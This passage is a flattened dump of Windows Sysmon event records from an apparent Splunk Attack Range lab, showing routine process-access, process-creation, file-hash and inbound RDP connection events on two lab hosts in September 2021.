09:17:28.368{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980003Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:28.368{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980002Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:28.368{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980001Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:28.368{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980000Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:28.368{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979999Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:28.368{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979998Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:28.368{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979997Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:28.368{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979996Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:28.368{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8C28-6151-EE79-00000000FD01}3448C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000979995Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:28.368{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979994Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:28.368{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8C28-6151-EE79-00000000FD01}3448C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000979993Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:28.353{69CF5F33-8C28-6151-EE79-00000000FD01}3448C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000979992Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:28.118{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=474F853415DF1ADBF126B038902DB56D,SHA256=BCFFD636992EBA5B9F490DD5B4EB5893DEA27BBB5BAD01EA32AF5FEFEC95ED1F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979991Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:24.608{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-63461-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x80000000000000001051581Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:25.981{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-63669-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001051580Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:25.697{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53462-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001051587Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:29.592{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC642185D0C42E6BCDF1CACF3DF29B29,SHA256=5215206C5E92E9C76EEBC2037635B0256B21B37A03D827562E948B13C1451AC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980021Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:29.368{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F6E16282CAEA5BF38651C7A41E945997,SHA256=3E72204259072D07808368EE7C803B4DC48B6475C0CD8C2A65E3924AA5E85E54,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000980020Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:29.290{69CF5F33-8C29-6151-EF79-00000000FD01}3508932C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000980019Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:29.259{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCC196C0818AAFC4282B13AB92965784,SHA256=A3968C89DC27AA3EFBA97754DAEC382E4F6C4E72D687F413E15226CF56B066E0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051586Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:29.223{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051585Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:29.223{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051584Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:29.193{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051583Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:29.192{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980018Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:29.055{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8C29-6151-EF79-00000000FD01}3508C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980017Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:29.055{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980016Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:29.055{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980015Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:29.055{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980014Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:29.055{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980013Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:29.055{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980012Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 